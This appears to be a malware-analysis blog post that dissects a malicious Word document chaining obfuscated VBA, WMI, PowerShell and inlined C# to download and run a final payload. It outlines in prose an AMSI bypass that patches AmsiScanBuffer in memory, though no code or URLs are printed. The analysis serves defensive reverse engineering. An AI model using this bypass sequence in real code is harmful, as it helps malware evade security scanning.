Obfuscated VBA, Powershell, C#

VBA Macros remain a dominant attack vector. Today, we perform a deep-dive analysis of a multi-tiered threat that chains VBA, WMI Objects, PowerShell, and Inlined C#, complete with an AMSI bypass.

MD5: 9eafc9090d71b382af7c8c04e83d61d2
Sample: Download via Any.Run

Full Video Analysis



Initial Analysis: The Office Container

This sample was provided by a reader curious about our approach to modern Word documents. We start by inspecting the file in a hex editor. The PK header immediately tells us this is a ZIP-based Office Open XML (OOXML) file.

Hex Header Analysis

Using OfficeMalScanner, we extract the VBAPROJECT.BIN. Scanning that binary reveals a heavily obfuscated VBA script designed to be unreadable to the human eye.



Opening Pandora's Box: VBA & WMI

We can't just run the script; it relies on hidden document variables to function. By debugging in Microsoft Word's Developer Tools and checking the Locals window, we find two critical variables:

  • Variable 1: Decodes to a WMI Object (Win32_Process) used to launch stealthy processes.
  • Variable 2: Decodes to a large PowerShell script.
VBA Variables Debugging


PowerShell & Inlined C#

The PowerShell stage is just a wrapper. After cleaning up the code in the PowerShell ISE, we find an Add-Type call. This is a classic technique for "inlining" C# code directly into a PowerShell session.

The decoded C# code contains the final payload logic, but it has one more trick up its sleeve before it reaches out to the internet.



The AMSI Bypass

The Anti-Malware Scanning Interface (AMSI) is designed to catch scripts like this as they de-obfuscate in memory. To beat it, this malware uses a sophisticated patching technique:

  1. Uses LoadLibrary to find amsi.dll.
  2. Locates AmsiScanBuffer via GetProcAddress.
  3. Uses VirtualProtect and RtlMoveMemory to overwrite the function instructions, effectively disabling the scan engine for the current process.


The Finish Line: Final Payload

With AMSI disabled, the C# code reveals its true purpose: downloading the final stage malware from a remote URL. Using a WebClient connection, it pulls an executable into %TEMP% and launches it.

Final Download URL Revealed


Conclusion: Why Do It Manually?

Could we have just run this in a sandbox? Yes. But as reverse engineers, we must be curious. Sandboxes can be tricked by anti-analysis checks, and IOCs can be faked. By painstakingly sifting through the code, we learn the how and the why—the only way to stay ahead of tomorrow's threats.

Stay curious. Happy Hunting.